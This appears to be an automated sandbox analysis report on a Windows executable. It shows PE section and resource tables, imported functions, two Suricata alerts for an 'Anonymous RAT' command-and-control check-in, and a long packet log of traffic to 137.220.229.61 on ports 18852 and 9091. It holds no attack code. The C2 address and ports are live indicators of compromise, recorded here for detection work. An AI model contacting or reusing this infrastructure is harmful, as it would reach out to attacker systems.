                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x130000x310.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                              .text0x10000x113170x11400797279c5ab1a163aed1f2a528f9fe3ceFalse0.6174988677536232data6.576987441854239IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                              .rdata0x130000x30ea0x32001359639b02bcb8f0a8743e6ead1c0030False0.43828125data5.549434098115495IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              .data0x170000x292c0x8009415c9c8dea3245d6d73c23393e27d8eFalse0.431640625data3.6583182363171756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              .rsrc0x1a0000x190d70x19200aedf42f084dabb70902985d8cb8d4f42False0.14223802860696516data4.481844282645869IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                              RT_ICON0x1a2080x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088RussianRussia0.42819148936170215
                                                                                              RT_ICON0x1a6700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224RussianRussia0.2767354596622889
                                                                                              RT_ICON0x1b7180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600RussianRussia0.2513485477178423
                                                                                              RT_ICON0x1dcc00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896RussianRussia0.17170524326877656
                                                                                              RT_ICON0x21ee80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584RussianRussia0.09922512717378446
                                                                                              RT_GROUP_ICON0x327100x4cdataRussianRussia0.7763157894736842
                                                                                              RT_VERSION0x3275c0x350dataEnglishUnited States0.47523584905660377
                                                                                              RT_VERSION0x32aac0x3b0dataChineseChina0.4523305084745763
                                                                                              RT_MANIFEST0x32e5c0x27bASCII text, with very long lines (635), with no line terminatorsEnglishUnited States0.5118110236220472
                                                                                              DLLImport
                                                                                              COMCTL32.dll
                                                                                              KERNEL32.dllGetFileAttributesW, CreateDirectoryW, WriteFile, GetStdHandle, VirtualFree, GetModuleHandleW, GetProcAddress, LoadLibraryA, LockResource, LoadResource, SizeofResource, FindResourceExA, MulDiv, GlobalFree, GlobalAlloc, lstrcmpiA, GetSystemDefaultLCID, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, MultiByteToWideChar, GetLocaleInfoW, lstrlenA, lstrcmpiW, GetEnvironmentVariableW, lstrcmpW, GlobalMemoryStatusEx, VirtualAlloc, WideCharToMultiByte, ExpandEnvironmentStringsW, RemoveDirectoryW, FindClose, FindNextFileW, DeleteFileW, FindFirstFileW, SetThreadLocale, GetLocalTime, GetSystemTimeAsFileTime, lstrlenW, GetTempPathW, SetEnvironmentVariableW, CloseHandle, CreateFileW, GetDriveTypeW, SetCurrentDirectoryW, GetModuleFileNameW, GetCommandLineW, GetVersionExW, CreateEventW, SetEvent, ResetEvent, InitializeCriticalSection, TerminateThread, ResumeThread, SuspendThread, IsBadReadPtr, LocalFree, lstrcpyW, FormatMessageW, GetSystemDirectoryW, DeleteCriticalSection, GetFileSize, SetFilePointer, ReadFile, SetFileTime, SetEndOfFile, EnterCriticalSection, LeaveCriticalSection, WaitForMultipleObjects, GetModuleHandleA, SystemTimeToFileTime, GetLastError, CreateThread, WaitForSingleObject, GetExitCodeThread, Sleep, SetLastError, SetFileAttributesW, GetDiskFreeSpaceExW, lstrcatW, ExitProcess, CompareFileTime, GetStartupInfoA
                                                                                              USER32.dllCharUpperW, EndDialog, DestroyWindow, KillTimer, ReleaseDC, DispatchMessageW, GetMessageW, SetTimer, CreateWindowExW, ScreenToClient, GetWindowRect, wsprintfW, GetParent, GetSystemMenu, EnableMenuItem, EnableWindow, MessageBeep, LoadIconW, LoadImageW, wvsprintfW, IsWindow, DefWindowProcW, CallWindowProcW, DrawIconEx, DialogBoxIndirectParamW, GetWindow, ClientToScreen, GetDC, DrawTextW, ShowWindow, SystemParametersInfoW, SetFocus, SetWindowLongW, GetSystemMetrics, GetClientRect, GetDlgItem, GetKeyState, MessageBoxA, wsprintfA, SetWindowTextW, GetSysColor, GetWindowTextLengthW, GetWindowTextW, GetClassNameA, GetWindowLongW, GetMenu, SetWindowPos, CopyImage, SendMessageW, GetWindowDC
                                                                                              GDI32.dllGetCurrentObject, StretchBlt, SetStretchBltMode, CreateCompatibleBitmap, SelectObject, CreateCompatibleDC, GetObjectW, GetDeviceCaps, DeleteObject, CreateFontIndirectW, DeleteDC
                                                                                              SHELL32.dllSHGetFileInfoW, SHBrowseForFolderW, SHGetPathFromIDListW, SHGetMalloc, ShellExecuteExW, SHGetSpecialFolderPathW, ShellExecuteW
                                                                                              ole32.dllCoInitialize, CreateStreamOnHGlobal, CoCreateInstance
                                                                                              OLEAUT32.dllVariantClear, OleLoadPicture, SysAllocString
                                                                                              MSVCRT.dll__set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ??1type_info@@UAE@XZ, _onexit, __dllonexit, _CxxThrowException, _beginthreadex, _EH_prolog, memset, _wcsnicmp, strncmp, malloc, memmove, _wtol, memcpy, free, memcmp, _purecall, ??2@YAPAXI@Z, ??3@YAXPAX@Z, _except_handler3, _controlfp
                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                              RussianRussia
                                                                                              EnglishUnited States
                                                                                              ChineseChina
                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                              2025-01-04T14:48:52.519499+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.453816137.220.229.619091TCP
                                                                                              2025-01-04T14:50:00.195548+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.453836137.220.229.619091TCP
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Jan 4, 2025 14:47:50.921454906 CET5367253192.168.2.41.1.1.1
                                                                                              Jan 4, 2025 14:47:50.926259995 CET53536721.1.1.1192.168.2.4
                                                                                              Jan 4, 2025 14:47:50.926330090 CET5367253192.168.2.41.1.1.1
                                                                                              Jan 4, 2025 14:47:50.931137085 CET53536721.1.1.1192.168.2.4
                                                                                              Jan 4, 2025 14:47:51.391940117 CET5367253192.168.2.41.1.1.1
                                                                                              Jan 4, 2025 14:47:51.396931887 CET53536721.1.1.1192.168.2.4
                                                                                              Jan 4, 2025 14:47:51.397574902 CET5367253192.168.2.41.1.1.1
                                                                                              Jan 4, 2025 14:48:49.023248911 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:49.028032064 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:49.028114080 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:49.828409910 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:49.828433037 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:49.828443050 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:49.828454018 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:49.828464031 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:49.828475952 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:49.828483105 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:49.828499079 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:49.828510046 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:49.828516960 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:49.828526020 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:49.828526020 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:49.828538895 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:49.828547001 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:49.828573942 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:49.833376884 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:49.833388090 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:49.833399057 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:49.833408117 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:49.833422899 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:49.833446026 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:50.043203115 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.043215036 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.043226004 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.043236971 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.043272018 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:50.043292046 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:50.043433905 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.043498993 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.043509960 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.043519974 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.043530941 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.043540955 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.043541908 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:50.043565035 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:50.043586969 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:50.044343948 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.044362068 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.044373989 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.044384956 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.044394970 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.044405937 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.044413090 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:50.044442892 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:50.045150995 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.045161963 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.045172930 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.045209885 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:50.045500994 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.045511961 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.045522928 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.045551062 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:50.045582056 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:50.045876980 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.045886040 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.045929909 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:50.255661011 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.255675077 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.255686045 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.255697012 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.255721092 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.255747080 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:50.255778074 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:50.255891085 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.255901098 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.255917072 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.255928040 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.255934954 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:50.255939007 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.255949020 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:50.255979061 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:50.256370068 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.256381035 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.256386995 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.256407022 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.256416082 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:50.256417036 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.256427050 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.256450891 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:50.256479025 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:50.256953955 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.256964922 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.256975889 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.256992102 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:50.257153034 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.257162094 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.257170916 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.257188082 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:50.257203102 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:50.257421970 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.257431984 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.257440090 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.257476091 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:50.257729053 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.257739067 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.257747889 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.257757902 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.257766008 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.257775068 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:50.257802010 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:50.258342028 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.258389950 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.258399010 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.258428097 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:50.258447886 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.258456945 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.258466005 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.258496046 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:50.259265900 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.259291887 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.259319067 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.259336948 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.259341002 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:50.259377003 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:50.260603905 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.260629892 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.260641098 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.260653019 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.260663033 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.260673046 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.260674000 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:50.260684967 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.260696888 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.260715008 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:50.260740042 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:50.261250973 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.261261940 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.261272907 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.261301041 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:50.261358023 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.261368036 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.261403084 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:50.468187094 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.468206882 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.468218088 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.468228102 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.468238115 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.468251944 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:50.468286037 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:50.468288898 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.468303919 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.468313932 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.468322992 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.468333006 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.468339920 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:50.468370914 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:50.468492031 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.468502045 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.468511105 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.468519926 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.468529940 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.468535900 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:50.468549967 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:50.468662024 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.468671083 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.468684912 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.468693018 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:50.468730927 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:50.469089985 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.469151020 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.469158888 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.469167948 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.469182968 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.469192028 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.469208002 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:50.469238043 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:50.469247103 CET1885253790137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:50.469383001 CET5379018852192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:52.514343023 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:52.519161940 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:52.519217014 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:52.519499063 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:52.524234056 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:53.387727022 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:53.388015985 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:53.392852068 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:53.392862082 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:53.392872095 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:53.697772026 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:53.697792053 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:53.697802067 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:53.697839975 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:53.697941065 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:53.697952986 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:53.697963953 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:53.698003054 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:53.698015928 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:53.698025942 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:53.698035955 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:53.698048115 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:53.698057890 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:53.698061943 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:53.698075056 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:53.702600002 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:53.702646017 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:53.912587881 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:53.912755013 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:53.912765980 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:53.912818909 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:53.913638115 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:53.913654089 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:53.913665056 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:53.913675070 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:53.913685083 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:53.913686037 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:53.913695097 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:53.913705111 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:53.913708925 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:53.913713932 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:53.913724899 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:53.913734913 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:53.913753986 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:53.914227009 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:53.914237022 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:53.914247036 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:53.914256096 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:53.914264917 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:53.914268017 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:53.914310932 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:53.914870024 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:53.914885998 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:53.914896965 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:53.914906979 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:53.914912939 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:53.914916992 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:53.914931059 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:53.914957047 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:53.915621996 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:53.917568922 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:53.917618036 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.127289057 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.127300978 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.127322912 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.127331972 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.127342939 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.127353907 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.127361059 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.127405882 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.127466917 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.127475977 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.127487898 CET909153816137.220.229.61192.168.2.4
